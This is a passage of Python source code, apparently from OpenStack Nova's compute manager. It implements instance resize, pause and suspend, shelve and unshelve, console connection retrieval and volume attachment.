This is initiated from the destination host's ``prep_resize`` routine
and runs on the source host.
"""
try:
self._resize_instance(context, instance, image, migration,
instance_type, clean_shutdown)
except Exception:
with excutils.save_and_reraise_exception():
self._revert_allocation(context, instance, migration)
def _resize_instance(self, context, instance, image,
migration, instance_type, clean_shutdown):
with self._error_out_instance_on_exception(context, instance), \
errors_out_migration_ctxt(migration):
network_info = self.network_api.get_instance_nw_info(context,
instance)
migration.status = 'migrating'
with migration.obj_as_admin():
migration.save()
instance.task_state = task_states.RESIZE_MIGRATING
instance.save(expected_task_state=task_states.RESIZE_PREP)
self._notify_about_instance_usage(
context, instance, "resize.start", network_info=network_info)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESIZE,
phase=fields.NotificationPhase.START, bdms=bdms)
block_device_info = self._get_instance_block_device_info(
context, instance, bdms=bdms)
timeout, retry_interval = self._get_power_off_values(context,
instance, clean_shutdown)
disk_info = self.driver.migrate_disk_and_power_off(
context, instance, migration.dest_host,
instance_type, network_info,
block_device_info,
timeout, retry_interval)
self._terminate_volume_connections(context, instance, bdms)
migration_p = obj_base.obj_to_primitive(migration)
self.network_api.migrate_instance_start(context,
instance,
migration_p)
migration.status = 'post-migrating'
with migration.obj_as_admin():
migration.save()
instance.host = migration.dest_compute
instance.node = migration.dest_node
instance.task_state = task_states.RESIZE_MIGRATED
instance.save(expected_task_state=task_states.RESIZE_MIGRATING)
# RPC cast to the destination host to finish the resize/migration.
self.compute_rpcapi.finish_resize(context, instance,
migration, image, disk_info, migration.dest_compute)
self._notify_about_instance_usage(context, instance, "resize.end",
network_info=network_info)
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESIZE,
phase=fields.NotificationPhase.END, bdms=bdms)
self.instance_events.clear_events_for_instance(instance)
def _terminate_volume_connections(self, context, instance, bdms):
connector = None
for bdm in bdms:
if bdm.is_volume:
if bdm.attachment_id:
# NOTE(jdg): So here's the thing, the idea behind the new
# attach API's was to have a new code fork/path that we
# followed, we're not going to do that so we have to do
# some extra work in here to make it *behave* just like the
# old code. Cinder doesn't allow disconnect/reconnect (you
# just delete the attachment and get a new one)
# attachments in the new attach code so we have to do
# a delete and create without a connector (reserve),
# in other words, beware
attachment_id = self.volume_api.attachment_create(
context, bdm.volume_id, instance.uuid)['id']
self.volume_api.attachment_delete(context,
bdm.attachment_id)
bdm.attachment_id = attachment_id
bdm.save()
else:
if connector is None:
connector = self.driver.get_volume_connector(instance)
self.volume_api.terminate_connection(context,
bdm.volume_id,
connector)
@staticmethod
def _set_instance_info(instance, instance_type):
instance.instance_type_id = instance_type.id
instance.memory_mb = instance_type.memory_mb
instance.vcpus = instance_type.vcpus
instance.root_gb = instance_type.root_gb
instance.ephemeral_gb = instance_type.ephemeral_gb
instance.flavor = instance_type
def _update_volume_attachments(self, context, instance, bdms):
"""Updates volume attachments using the virt driver host connector.
:param context: nova.context.RequestContext - user request context
:param instance: nova.objects.Instance
:param bdms: nova.objects.BlockDeviceMappingList - the list of block
device mappings for the given instance
"""
if bdms:
connector = None
for bdm in bdms:
if bdm.is_volume and bdm.attachment_id:
if connector is None:
connector = self.driver.get_volume_connector(instance)
self.volume_api.attachment_update(
context, bdm.attachment_id, connector, bdm.device_name)
def _complete_volume_attachments(self, context, bdms):
"""Completes volume attachments for the instance
:param context: nova.context.RequestContext - user request context
:param bdms: nova.objects.BlockDeviceMappingList - the list of block
device mappings for the given instance
"""
if bdms:
for bdm in bdms:
if bdm.is_volume and bdm.attachment_id:
self.volume_api.attachment_complete(
context, bdm.attachment_id)
def _finish_resize(self, context, instance, migration, disk_info,
image_meta, bdms):
resize_instance = False
old_instance_type_id = migration['old_instance_type_id']
new_instance_type_id = migration['new_instance_type_id']
old_instance_type = instance.get_flavor()
# NOTE(mriedem): Get the old_vm_state so we know if we should
# power on the instance. If old_vm_state is not set we need to default
# to ACTIVE for backwards compatibility
old_vm_state = instance.system_metadata.get('old_vm_state',
vm_states.ACTIVE)
instance.old_flavor = old_instance_type
if old_instance_type_id != new_instance_type_id:
instance_type = instance.get_flavor('new')
self._set_instance_info(instance, instance_type)
for key in ('root_gb', 'swap', 'ephemeral_gb'):
if old_instance_type[key] != instance_type[key]:
resize_instance = True
break
instance.apply_migration_context()
# NOTE(tr3buchet): setup networks on destination host
self.network_api.setup_networks_on_host(context, instance,
migration['dest_compute'])
migration_p = obj_base.obj_to_primitive(migration)
self.network_api.migrate_instance_finish(context,
instance,
migration_p)
network_info = self.network_api.get_instance_nw_info(context, instance)
instance.task_state = task_states.RESIZE_FINISH
instance.save(expected_task_state=task_states.RESIZE_MIGRATED)
self._notify_about_instance_usage(
context, instance, "finish_resize.start",
network_info=network_info)
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESIZE_FINISH,
phase=fields.NotificationPhase.START, bdms=bdms)
# We need to update any volume attachments using the destination
# host connector so that we can update the BDM.connection_info
# before calling driver.finish_migration otherwise the driver
# won't know how to connect the volumes to this host.
# Note that _get_instance_block_device_info with
# refresh_conn_info=True will update the BDM.connection_info value
# in the database so we must do this before calling that method.
self._update_volume_attachments(context, instance, bdms)
block_device_info = self._get_instance_block_device_info(
context, instance, refresh_conn_info=True, bdms=bdms)
# NOTE(mriedem): If the original vm_state was STOPPED, we don't
# automatically power on the instance after it's migrated
power_on = old_vm_state != vm_states.STOPPED
try:
self.driver.finish_migration(context, migration, instance,
disk_info,
network_info,
image_meta, resize_instance,
block_device_info, power_on)
except Exception:
with excutils.save_and_reraise_exception():
if old_instance_type_id != new_instance_type_id:
self._set_instance_info(instance,
old_instance_type)
# Now complete any volume attachments that were previously updated.
self._complete_volume_attachments(context, bdms)
migration.status = 'finished'
with migration.obj_as_admin():
migration.save()
instance.vm_state = vm_states.RESIZED
instance.task_state = None
instance.launched_at = timeutils.utcnow()
instance.save(expected_task_state=task_states.RESIZE_FINISH)
return network_info
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def finish_resize(self, context, disk_info, image, instance,
migration):
"""Completes the migration process.
Sets up the newly transferred disk and turns on the instance at its
new host machine.
"""
try:
self._finish_resize_helper(context, disk_info, image, instance,
migration)
except Exception:
with excutils.save_and_reraise_exception():
self._revert_allocation(context, instance, migration)
def _finish_resize_helper(self, context, disk_info, image, instance,
migration):
"""Completes the migration process.
The caller must revert the instance's allocations if the migration
process failed.
"""
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
with self._error_out_instance_on_exception(context, instance), \
errors_out_migration_ctxt(migration):
image_meta = objects.ImageMeta.from_dict(image)
network_info = self._finish_resize(context, instance, migration,
disk_info, image_meta, bdms)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(
context, instance, "finish_resize.end",
network_info=network_info)
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESIZE_FINISH,
phase=fields.NotificationPhase.END, bdms=bdms)
@wrap_exception()
@wrap_instance_fault
def add_fixed_ip_to_instance(self, context, network_id, instance):
"""Calls network_api to add new fixed_ip to instance
then injects the new network info and resets instance networking.
"""
self._notify_about_instance_usage(
context, instance, "create_ip.start")
network_info = self.network_api.add_fixed_ip_to_instance(context,
instance,
network_id)
self._inject_network_info(context, instance, network_info)
self.reset_network(context, instance)
# NOTE(russellb) We just want to bump updated_at. See bug 1143466.
instance.updated_at = timeutils.utcnow()
instance.save()
self._notify_about_instance_usage(
context, instance, "create_ip.end", network_info=network_info)
@wrap_exception()
@wrap_instance_fault
def remove_fixed_ip_from_instance(self, context, address, instance):
"""Calls network_api to remove existing fixed_ip from instance
by injecting the altered network info and resetting
instance networking.
"""
self._notify_about_instance_usage(
context, instance, "delete_ip.start")
network_info = self.network_api.remove_fixed_ip_from_instance(context,
instance,
address)
self._inject_network_info(context, instance, network_info)
self.reset_network(context, instance)
# NOTE(russellb) We just want to bump updated_at. See bug 1143466.
instance.updated_at = timeutils.utcnow()
instance.save()
self._notify_about_instance_usage(
context, instance, "delete_ip.end", network_info=network_info)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def pause_instance(self, context, instance):
"""Pause an instance on this host."""
context = context.elevated()
LOG.info('Pausing', instance=instance)
self._notify_about_instance_usage(context, instance, 'pause.start')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.PAUSE,
phase=fields.NotificationPhase.START)
self.driver.pause(instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.PAUSED
instance.task_state = None
instance.save(expected_task_state=task_states.PAUSING)
self._notify_about_instance_usage(context, instance, 'pause.end')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.PAUSE,
phase=fields.NotificationPhase.END)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def unpause_instance(self, context, instance):
"""Unpause a paused instance on this host."""
context = context.elevated()
LOG.info('Unpausing', instance=instance)
self._notify_about_instance_usage(context, instance, 'unpause.start')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.UNPAUSE,
phase=fields.NotificationPhase.START)
self.driver.unpause(instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.save(expected_task_state=task_states.UNPAUSING)
self._notify_about_instance_usage(context, instance, 'unpause.end')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.UNPAUSE,
phase=fields.NotificationPhase.END)
@wrap_exception()
def host_power_action(self, context, action):
"""Reboots, shuts down or powers up the host."""
return self.driver.host_power_action(action)
@wrap_exception()
def host_maintenance_mode(self, context, host, mode):
"""Start/Stop host maintenance window. On start, it triggers
guest VMs evacuation.
"""
return self.driver.host_maintenance_mode(host, mode)
@wrap_exception()
def set_host_enabled(self, context, enabled):
"""Sets the specified host's ability to accept new instances."""
return self.driver.set_host_enabled(enabled)
@wrap_exception()
def get_host_uptime(self, context):
"""Returns the result of calling "uptime" on the target host."""
return self.driver.get_host_uptime()
@wrap_exception()
@wrap_instance_fault
def get_diagnostics(self, context, instance):
"""Retrieve diagnostics for an instance on this host."""
current_power_state = self._get_power_state(context, instance)
if current_power_state == power_state.RUNNING:
LOG.info("Retrieving diagnostics", instance=instance)
return self.driver.get_diagnostics(instance)
else:
raise exception.InstanceInvalidState(
attr='power state',
instance_uuid=instance.uuid,
state=power_state.STATE_MAP[instance.power_state],
method='get_diagnostics')
@wrap_exception()
@wrap_instance_fault
def get_instance_diagnostics(self, context, instance):
"""Retrieve diagnostics for an instance on this host."""
current_power_state = self._get_power_state(context, instance)
if current_power_state == power_state.RUNNING:
LOG.info("Retrieving diagnostics", instance=instance)
return self.driver.get_instance_diagnostics(instance)
else:
raise exception.InstanceInvalidState(
attr='power state',
instance_uuid=instance.uuid,
state=power_state.STATE_MAP[instance.power_state],
method='get_diagnostics')
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def suspend_instance(self, context, instance):
"""Suspend the given instance."""
context = context.elevated()
# Store the old state
instance.system_metadata['old_vm_state'] = instance.vm_state
self._notify_about_instance_usage(context, instance, 'suspend.start')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.SUSPEND,
phase=fields.NotificationPhase.START)
with self._error_out_instance_on_exception(context, instance,
instance_state=instance.vm_state):
self.driver.suspend(context, instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.SUSPENDED
instance.task_state = None
instance.save(expected_task_state=task_states.SUSPENDING)
self._notify_about_instance_usage(context, instance, 'suspend.end')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.SUSPEND,
phase=fields.NotificationPhase.END)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def resume_instance(self, context, instance):
"""Resume the given suspended instance."""
context = context.elevated()
LOG.info('Resuming', instance=instance)
self._notify_about_instance_usage(context, instance, 'resume.start')
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = self._get_instance_block_device_info(
context, instance, bdms=bdms)
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESUME,
phase=fields.NotificationPhase.START, bdms=bdms)
network_info = self.network_api.get_instance_nw_info(context, instance)
with self._error_out_instance_on_exception(context, instance,
instance_state=instance.vm_state):
self.driver.resume(context, instance, network_info,
block_device_info)
instance.power_state = self._get_power_state(context, instance)
# We default to the ACTIVE state for backwards compatibility
instance.vm_state = instance.system_metadata.pop('old_vm_state',
vm_states.ACTIVE)
instance.task_state = None
instance.save(expected_task_state=task_states.RESUMING)
self._notify_about_instance_usage(context, instance, 'resume.end')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESUME,
phase=fields.NotificationPhase.END, bdms=bdms)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def shelve_instance(self, context, instance, image_id,
clean_shutdown):
"""Shelve an instance.
This should be used when you want to take a snapshot of the instance.
It also adds system_metadata that can be used by a periodic task to
offload the shelved instance after a period of time.
:param context: request context
:param instance: an Instance object
:param image_id: an image id to snapshot to.
:param clean_shutdown: give the GuestOS a chance to stop
"""
@utils.synchronized(instance.uuid)
def do_shelve_instance():
self._shelve_instance(context, instance, image_id, clean_shutdown)
do_shelve_instance()
def _shelve_instance(self, context, instance, image_id,
clean_shutdown):
LOG.info('Shelving', instance=instance)
offload = CONF.shelved_offload_time == 0
if offload:
# Get the BDMs early so we can pass them into versioned
# notifications since _shelve_offload_instance needs the
# BDMs anyway.
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
else:
bdms = None
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
self._notify_about_instance_usage(context, instance, 'shelve.start')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.SHELVE,
phase=fields.NotificationPhase.START, bdms=bdms)
def update_task_state(task_state, expected_state=task_states.SHELVING):
shelving_state_map = {
task_states.IMAGE_PENDING_UPLOAD:
task_states.SHELVING_IMAGE_PENDING_UPLOAD,
task_states.IMAGE_UPLOADING:
task_states.SHELVING_IMAGE_UPLOADING,
task_states.SHELVING: task_states.SHELVING}
task_state = shelving_state_map[task_state]
expected_state = shelving_state_map[expected_state]
instance.task_state = task_state
instance.save(expected_task_state=expected_state)
# Do not attempt a clean shutdown of a paused guest since some
# hypervisors will fail the clean shutdown if the guest is not
# running.
if instance.power_state == power_state.PAUSED:
clean_shutdown = False
self._power_off_instance(context, instance, clean_shutdown)
self.driver.snapshot(context, instance, image_id, update_task_state)
instance.system_metadata['shelved_at'] = timeutils.utcnow().isoformat()
instance.system_metadata['shelved_image_id'] = image_id
instance.system_metadata['shelved_host'] = self.host
instance.vm_state = vm_states.SHELVED
instance.task_state = None
if CONF.shelved_offload_time == 0:
instance.task_state = task_states.SHELVING_OFFLOADING
instance.power_state = self._get_power_state(context, instance)
instance.save(expected_task_state=[
task_states.SHELVING,
task_states.SHELVING_IMAGE_UPLOADING])
self._notify_about_instance_usage(context, instance, 'shelve.end')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.SHELVE,
phase=fields.NotificationPhase.END, bdms=bdms)
if offload:
self._shelve_offload_instance(context, instance,
clean_shutdown=False, bdms=bdms)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def shelve_offload_instance(self, context, instance, clean_shutdown):
"""Remove a shelved instance from the hypervisor.
This frees up those resources for use by other instances, but may lead
to slower unshelve times for this instance. This method is used by
volume backed instances since restoring them doesn't involve the
potentially large download of an image.
:param context: request context
:param instance: nova.objects.instance.Instance
:param clean_shutdown: give the GuestOS a chance to stop
"""
@utils.synchronized(instance.uuid)
def do_shelve_offload_instance():
self._shelve_offload_instance(context, instance, clean_shutdown)
do_shelve_offload_instance()
def _shelve_offload_instance(self, context, instance, clean_shutdown,
bdms=None):
LOG.info('Shelve offloading', instance=instance)
if bdms is None:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
self._notify_about_instance_usage(context, instance,
'shelve_offload.start')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.SHELVE_OFFLOAD,
phase=fields.NotificationPhase.START, bdms=bdms)
self._power_off_instance(context, instance, clean_shutdown)
current_power_state = self._get_power_state(context, instance)
self.network_api.cleanup_instance_network_on_host(context, instance,
instance.host)
network_info = self.network_api.get_instance_nw_info(context, instance)
block_device_info = self._get_instance_block_device_info(context,
instance,
bdms=bdms)
self.driver.destroy(context, instance, network_info,
block_device_info)
# the instance is going to be removed from the host so we want to
# terminate all the connections with the volume server and the host
self._terminate_volume_connections(context, instance, bdms)
instance.power_state = current_power_state
# NOTE(mriedem): The vm_state has to be set before updating the
# resource tracker, see vm_states.ALLOW_RESOURCE_REMOVAL. The host/node
# values cannot be nulled out until after updating the resource tracker
# though.
instance.vm_state = vm_states.SHELVED_OFFLOADED
instance.task_state = None
instance.save(expected_task_state=[task_states.SHELVING,
task_states.SHELVING_OFFLOADING])
# NOTE(ndipanov): Free resources from the resource tracker
self._update_resource_tracker(context, instance)
rt = self._get_resource_tracker()
rt.delete_allocation_for_shelve_offloaded_instance(context, instance)
# NOTE(sfinucan): RPC calls should no longer be attempted against this
# instance, so ensure any calls result in errors
self._nil_out_instance_obj_host_and_node(instance)
instance.save(expected_task_state=None)
self._delete_scheduler_instance_info(context, instance.uuid)
self._notify_about_instance_usage(context, instance,
'shelve_offload.end')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.SHELVE_OFFLOAD,
phase=fields.NotificationPhase.END, bdms=bdms)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def unshelve_instance(self, context, instance, image,
filter_properties, node):
"""Unshelve the instance.
:param context: request context
:param instance: a nova.objects.instance.Instance object
:param image: an image to build from. If None we assume a
volume backed instance.
:param filter_properties: dict containing limits, retry info etc.
:param node: target compute node
"""
if filter_properties is None:
filter_properties = {}
@utils.synchronized(instance.uuid)
def do_unshelve_instance():
self._unshelve_instance(context, instance, image,
filter_properties, node)
do_unshelve_instance()
def _unshelve_instance_key_scrub(self, instance):
"""Remove data from the instance that may cause side effects."""
cleaned_keys = dict(
key_data=instance.key_data,
auto_disk_config=instance.auto_disk_config)
instance.key_data = None
instance.auto_disk_config = False
return cleaned_keys
def _unshelve_instance_key_restore(self, instance, keys):
"""Restore previously scrubbed keys before saving the instance."""
instance.update(keys)
def _unshelve_instance(self, context, instance, image, filter_properties,
node):
LOG.info('Unshelving', instance=instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
self._notify_about_instance_usage(context, instance, 'unshelve.start')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.UNSHELVE,
phase=fields.NotificationPhase.START, bdms=bdms)
instance.task_state = task_states.SPAWNING
instance.save()
block_device_info = self._prep_block_device(context, instance, bdms)
scrubbed_keys = self._unshelve_instance_key_scrub(instance)
if node is None:
node = self._get_nodename(instance)
rt = self._get_resource_tracker()
limits = filter_properties.get('limits', {})
allocations = self.reportclient.get_allocations_for_consumer(
context, instance.uuid)
shelved_image_ref = instance.image_ref
if image:
instance.image_ref = image['id']
image_meta = objects.ImageMeta.from_dict(image)
else:
image_meta = objects.ImageMeta.from_dict(
utils.get_image_from_system_metadata(
instance.system_metadata))
self.network_api.setup_instance_network_on_host(context, instance,
self.host)
network_info = self.network_api.get_instance_nw_info(context, instance)
try:
with rt.instance_claim(context, instance, node, limits):
self.driver.spawn(context, instance, image_meta,
injected_files=[],
admin_password=None,
allocations=allocations,
network_info=network_info,
block_device_info=block_device_info)
except Exception:
with excutils.save_and_reraise_exception(logger=LOG):
LOG.exception('Instance failed to spawn',
instance=instance)
# Cleanup allocations created by the scheduler on this host
# since we failed to spawn the instance. We do this both if
# the instance claim failed with ComputeResourcesUnavailable
# or if we did claim but the spawn failed, because aborting the
# instance claim will not remove the allocations.
rt.reportclient.delete_allocation_for_instance(context,
instance.uuid)
# FIXME: Umm, shouldn't we be rolling back port bindings too?
self._terminate_volume_connections(context, instance, bdms)
# The reverts_task_state decorator on unshelve_instance will
# eventually save these updates.
self._nil_out_instance_obj_host_and_node(instance)
if image:
instance.image_ref = shelved_image_ref
self._delete_snapshot_of_shelved_instance(context, instance,
image['id'])
self._unshelve_instance_key_restore(instance, scrubbed_keys)
self._update_instance_after_spawn(context, instance)
# Delete system_metadata for a shelved instance
compute_utils.remove_shelved_keys_from_system_metadata(instance)
instance.save(expected_task_state=task_states.SPAWNING)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(context, instance, 'unshelve.end')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.UNSHELVE,
phase=fields.NotificationPhase.END, bdms=bdms)
@messaging.expected_exceptions(NotImplementedError)
@wrap_instance_fault
def reset_network(self, context, instance):
"""Reset networking on the given instance."""
LOG.debug('Reset network', instance=instance)
self.driver.reset_network(instance)
def _inject_network_info(self, context, instance, network_info):
"""Inject network info for the given instance."""
LOG.debug('Inject network info', instance=instance)
LOG.debug('network_info to inject: |%s|', network_info,
instance=instance)
self.driver.inject_network_info(instance,
network_info)
@wrap_instance_fault
def inject_network_info(self, context, instance):
"""Inject network info, but don't return the info."""
network_info = self.network_api.get_instance_nw_info(context, instance)
self._inject_network_info(context, instance, network_info)
@messaging.expected_exceptions(NotImplementedError,
exception.ConsoleNotAvailable,
exception.InstanceNotFound)
@wrap_exception()
@wrap_instance_fault
def get_console_output(self, context, instance, tail_length):
"""Send the console output for the given instance."""
context = context.elevated()
LOG.info("Get console output", instance=instance)
output = self.driver.get_console_output(context, instance)
if type(output) is six.text_type:
output = six.b(output)
if tail_length is not None:
output = self._tail_log(output, tail_length)
return output.decode('ascii', 'replace')
def _tail_log(self, log, length):
try:
length = int(length)
except ValueError:
length = 0
if length == 0:
return b''
else:
return b'\n'.join(log.split(b'\n')[-int(length):])
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_vnc_console(self, context, console_type, instance):
"""Return connection information for a vnc console."""
context = context.elevated()
LOG.debug("Getting vnc console", instance=instance)
token = uuidutils.generate_uuid()
if not CONF.vnc.enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
if console_type == 'novnc':
# For essex, novncproxy_base_url must include the full path
# including the html file (like http://myhost/vnc_auto.html)
access_url = '%s?token=%s' % (CONF.vnc.novncproxy_base_url, token)
elif console_type == 'xvpvnc':
access_url = '%s?token=%s' % (CONF.vnc.xvpvncproxy_base_url, token)
else:
raise exception.ConsoleTypeInvalid(console_type=console_type)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_vnc_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_spice_console(self, context, console_type, instance):
"""Return connection information for a spice console."""
context = context.elevated()
LOG.debug("Getting spice console", instance=instance)
token = uuidutils.generate_uuid()
if not CONF.spice.enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
if console_type == 'spice-html5':
# For essex, spicehtml5proxy_base_url must include the full path
# including the html file (like http://myhost/spice_auto.html)
access_url = '%s?token=%s' % (CONF.spice.html5proxy_base_url,
token)
else:
raise exception.ConsoleTypeInvalid(console_type=console_type)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_spice_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_rdp_console(self, context, console_type, instance):
"""Return connection information for a RDP console."""
context = context.elevated()
LOG.debug("Getting RDP console", instance=instance)
token = uuidutils.generate_uuid()
if not CONF.rdp.enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
if console_type == 'rdp-html5':
access_url = '%s?token=%s' % (CONF.rdp.html5_proxy_base_url,
token)
else:
raise exception.ConsoleTypeInvalid(console_type=console_type)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_rdp_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_mks_console(self, context, console_type, instance):
"""Return connection information for a MKS console."""
context = context.elevated()
LOG.debug("Getting MKS console", instance=instance)
token = uuidutils.generate_uuid()
if not CONF.mks.enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
if console_type == 'webmks':
access_url = '%s?token=%s' % (CONF.mks.mksproxy_base_url,
token)
else:
raise exception.ConsoleTypeInvalid(console_type=console_type)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_mks_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@messaging.expected_exceptions(
exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
exception.SocketPortRangeExhaustedException,
exception.ImageSerialPortNumberInvalid,
exception.ImageSerialPortNumberExceedFlavorValue,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_serial_console(self, context, console_type, instance):
"""Returns connection information for a serial console."""
LOG.debug("Getting serial console", instance=instance)
if not CONF.serial_console.enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
context = context.elevated()
token = uuidutils.generate_uuid()
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_serial_console(context, instance)
if console_type == 'serial':
# add only token
access_url = '%s?token=%s' % (CONF.serial_console.base_url,
token)
elif console_type == 'shellinabox':
# token and internal url for shellinabox
access_url = '%s%s?token=%s' % (
CONF.shellinabox.base_url,
console.internal_access_path,
token)
else:
raise exception.ConsoleTypeInvalid(console_type=console_type)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound)
@wrap_exception()
@wrap_instance_fault
def validate_console_port(self, ctxt, instance, port, console_type):
if console_type == "spice-html5":
console_info = self.driver.get_spice_console(ctxt, instance)
elif console_type == "rdp-html5":
console_info = self.driver.get_rdp_console(ctxt, instance)
elif console_type in ("serial", "shellinabox"):
console_info = self.driver.get_serial_console(ctxt, instance)
elif console_type == "webmks":
console_info = self.driver.get_mks_console(ctxt, instance)
else:
console_info = self.driver.get_vnc_console(ctxt, instance)
return console_info.port == port
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def reserve_block_device_name(self, context, instance, device,
volume_id, disk_bus, device_type, tag,
multiattach):
if (tag and not
self.driver.capabilities.get('supports_tagged_attach_volume',
False)):
raise exception.VolumeTaggedAttachNotSupported()
if (multiattach and not
self.driver.capabilities.get('supports_multiattach', False)):
raise exception.MultiattachNotSupportedByVirtDriver(
volume_id=volume_id)
@utils.synchronized(instance.uuid)
def do_reserve():
bdms = (
objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid))
# NOTE(ndipanov): We need to explicitly set all the fields on the
# object so that obj_load_attr does not fail
new_bdm = objects.BlockDeviceMapping(
context=context,
source_type='volume', destination_type='volume',
instance_uuid=instance.uuid, boot_index=None,
volume_id=volume_id,
device_name=device, guest_format=None,
disk_bus=disk_bus, device_type=device_type, tag=tag)
new_bdm.device_name = self._get_device_name_for_instance(
instance, bdms, new_bdm)
# NOTE(vish): create bdm here to avoid race condition
new_bdm.create()
return new_bdm
return do_reserve()
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def attach_volume(self, context, instance, bdm):
"""Attach a volume to an instance."""
driver_bdm = driver_block_device.convert_volume(bdm)
@utils.synchronized(instance.uuid)
def do_attach_volume(context, instance, driver_bdm):
try:
return self._attach_volume(context, instance, driver_bdm)
except Exception:
with excutils.save_and_reraise_exception():
bdm.destroy()
do_attach_volume(context, instance, driver_bdm)
def _attach_volume(self, context, instance, bdm):
context = context.elevated()
LOG.info('Attaching volume %(volume_id)s to %(mountpoint)s',
{'volume_id': bdm.volume_id,
'mountpoint': bdm['mount_device']},
instance=instance)
compute_utils.notify_about_volume_attach_detach(
context, instance, self.host,
action=fields.NotificationAction.VOLUME_ATTACH,
phase=fields.NotificationPhase.START,
volume_id=bdm.volume_id)
try:
bdm.attach(context, instance, self.volume_api, self.driver,
